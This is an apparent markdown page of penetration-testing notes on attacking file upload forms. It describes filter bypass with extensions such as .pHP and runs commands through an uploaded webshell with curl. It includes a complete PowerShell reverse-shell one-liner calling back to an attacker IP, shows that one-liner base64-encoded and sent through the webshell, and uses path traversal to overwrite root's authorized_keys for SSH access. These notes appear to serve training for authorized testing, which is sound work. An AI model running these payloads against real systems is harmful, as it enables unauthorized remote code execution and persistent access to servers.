Skip to content

Latest commit

 

History

History
79 lines (57 loc) · 3.07 KB

file-upload.md

File metadata and controls

79 lines (57 loc) · 3.07 KB

File upload

Using executable files

Bypassing filters using .phps or .php, or maybe using capital letters like .pHP.

{% code title=" Execution of dir command in the uploaded webshell" overflow="wrap" lineNumbers="true" %}

curl http://192.168.50.189/meteor/uploads/simple-backdoor.pHP?cmd=dir

{% endcode %}

{% code title="Starting netcat listener on port 4444" overflow="wrap" lineNumbers="true" %}

nc -nvlp 4444

{% endcode %}

{% code title="Encoding the oneliner in PowerShell on Linux" overflow="wrap" lineNumbers="true" %}

kali@kali:~$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

PS> $Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'


PS> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)

PS> $EncodedText =[Convert]::ToBase64String($Bytes)

PS> $EncodedText
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0
...
AYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA


PS> exit

{% endcode %}

{% code title="Using curl to send the base64 encoded reverse shell oneliner" overflow="wrap" lineNumbers="true" %}

curl http://192.168.50.189/meteor/uploads/simple-backdoor.pHP?cmd=powershell%20-enc%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0
...
AYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

{% endcode %}

Using non-executable files

{% hint style="info" %} When testing a file upload form, we should always determine what happens when a file is uploaded twice. If the web application indicates that the file already exists, we can use this method to brute force the contents of a web server. Alternatively, if the web application displays an error message, this may provide valuable information such as the programming language or web technologies in use. {% endhint %}

Modify filename in Burp to ../../../../../../../test.txt

{% code title="Prepare authorized_keys file for File Upload" overflow="wrap" lineNumbers="true" %}

kali@kali:~$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): fileup
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in fileup
Your public key has been saved in fileup.pub
...

kali@kali:~$ cat fileup.pub > authorized_keys

{% endcode %}

Change filename to ../../../../../../../root/.ssh/authorized_keys

SSH using the private key.